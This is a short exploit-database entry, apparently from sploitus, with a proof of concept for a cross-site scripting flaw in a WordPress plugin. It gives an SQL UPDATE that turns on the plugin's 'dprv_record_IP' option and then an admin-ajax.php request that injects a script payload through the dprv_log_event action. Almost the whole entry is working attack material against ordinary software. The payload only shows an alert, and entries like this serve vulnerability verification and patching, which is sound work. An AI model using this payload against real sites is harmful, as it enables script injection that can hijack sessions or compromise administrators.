Share
## https://sploitus.com/exploit?id=WPEX-ID:AF4F459E-E60B-4384-AAD9-0DC18AA3B338
To make it easier to verify the vulnerability without the need of registering an account within the plugin's settings, set the "dprv_record_IP" option to "on" in the database:
UPDATE wp_options SET option_value = 'on' WHERE option_name = 'dprv_record_IP';

https://example.com/wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(`xss`)%3C/script%3E